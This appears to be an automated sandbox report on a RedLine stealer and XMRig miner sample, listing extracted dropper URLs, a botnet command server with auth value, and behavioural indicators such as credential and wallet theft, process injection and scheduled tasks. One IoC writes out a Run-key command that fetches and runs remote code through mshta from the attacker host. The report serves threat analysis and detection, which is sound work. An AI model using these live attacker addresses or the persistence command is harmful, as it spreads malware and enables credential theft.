redline | hxxp://62[.]204[.]41[.]194/file[.]exe

Resubmissions

05-01-2023 23:51

230105-3wbz8adf75 10

05-01-2023 23:48

230105-3tlrmshc4z 8

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2023 23:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://62.204.41.194/file.exe

Score

10^/10

redline xmrig $infostealer miner persistence spyware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Extracted

Family

redline

Botnet

31.41.244.135:19850

Attributes

auth_value
66623f79e2af33286760f5dd6c4262dc

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2912-179-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/2912-180-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/2912-181-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/2912-184-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/2912-189-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/2912-229-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
24	4396	powershell.exe
26	2184	powershell.exe
27	1664	powershell.exe
29	2184	powershell.exe
43	1036	powershell.exe
44	1484	powershell.exe
45	4128	powershell.exe
53	1120	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

file.exeNoSleep.exefile.exefile.exeNoSleep.exefile.exe

pid process

4680 file.exe
1964 NoSleep.exe
4432 file.exe
2060 file.exe
1596 NoSleep.exe
4432 file.exe
4440 file.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4680	file.exe
1964	NoSleep.exe
4432	file.exe
2060	file.exe
1596	NoSleep.exe
4432	file.exe
4440	file.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta http://62.204.41.194/c.html"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta http://62.204.41.194/c.html"	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 ipinfo.io

flow	ioc
28	ipinfo.io

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.execonhost.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1664 set thread context of 1628	1664	powershell.exe	RegSvcs.exe
PID 3732 set thread context of 2912	3732	conhost.exe	conhost.exe
PID 4128 set thread context of 2984	4128	powershell.exe	RegSvcs.exe
PID 1120 set thread context of 4608	1120	powershell.exe	RegSvcs.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

508 schtasks.exe
4064 schtasks.exe

pid	process
508	schtasks.exe
4064	schtasks.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = ebb3b15315f6d801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "379731275"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{41B033D2-8D5C-11ED-919F-7A41DBBD5662} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "380792141"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31007081"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31007081"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000f3e5e2a51c92a9f52fbaa057ce1f2ff48d212fce9ddf38070371fe5f82b536c9000000000e800000000200002000000007caad00f4104cbaf47ad37dcc474b1d2993df208a131c2857b362a737d3c31a20000000180a436276155a4f0795e405452c0a481c84644b7945da39fc3bd9fd04489b0640000000d41977c011c90548290523da626678b6ea7373cd7ef2d9cfef6da9b069b939781e4623fca3898a1d447f7239b6d59ac132316d9d268771cdb8adb3787aaecacd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{3C5026EB-1375-43F4-B583-D5FD7173FA49}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "380792141"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000f1302052d24bddbdebe663f31f73674f1381050fb7f71f80102069eb066a277e000000000e800000000200002000000091504bb6d0a205c8e2d4c706e4598f4fefaf883a2208510659025f429dec88f3200000004df9607a5fe23b18627105d1eae68ea52d6743df4c2b37e1496635275610385740000000717680e4b4ed708033d32201176015b0c333dd828aa9bda6ea99bbda648693a489ffa22c810171a3b52af99111a0cecc2dbbaffbd5d69d48a5b16584033a5031	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10ac99176921d901	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0049a3176921d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe

Modifies registry class 56 IoCs

Processes:

iexplore.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000002d53b55dd2f5d8014a222d60d2f5d801ab07d460d2f5d80114000000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exeRegSvcs.exe

pid	process
2184	powershell.exe
2184	powershell.exe
1664	powershell.exe
1664	powershell.exe
2392	powershell.exe
2392	powershell.exe
4396	powershell.exe
4396	powershell.exe
4396	powershell.exe
2184	powershell.exe
2392	powershell.exe
1664	powershell.exe
2580	conhost.exe
2580	conhost.exe
3716	powershell.exe
3716	powershell.exe
3716	powershell.exe
3732	conhost.exe
1484	powershell.exe
1484	powershell.exe
4128	powershell.exe
4128	powershell.exe
1036	powershell.exe
1036	powershell.exe
3180	powershell.exe
3180	powershell.exe
1036	powershell.exe
1484	powershell.exe
4128	powershell.exe
3180	powershell.exe
1628	RegSvcs.exe
1628	RegSvcs.exe
1628	RegSvcs.exe
2912	conhost.exe
2912	conhost.exe
688	powershell.exe
688	powershell.exe
1120	powershell.exe
1120	powershell.exe
3752	powershell.exe
3752	powershell.exe
4900	powershell.exe
4900	powershell.exe
2912	conhost.exe
2912	conhost.exe
2152	conhost.exe
2152	conhost.exe
2912	conhost.exe
2912	conhost.exe
1120	powershell.exe
688	powershell.exe
3752	powershell.exe
4900	powershell.exe
4224	powershell.exe
4224	powershell.exe
4224	powershell.exe
2912	conhost.exe
2912	conhost.exe
2984	RegSvcs.exe
2984	RegSvcs.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2580	conhost.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe
Token: 36	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe
Token: 36	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
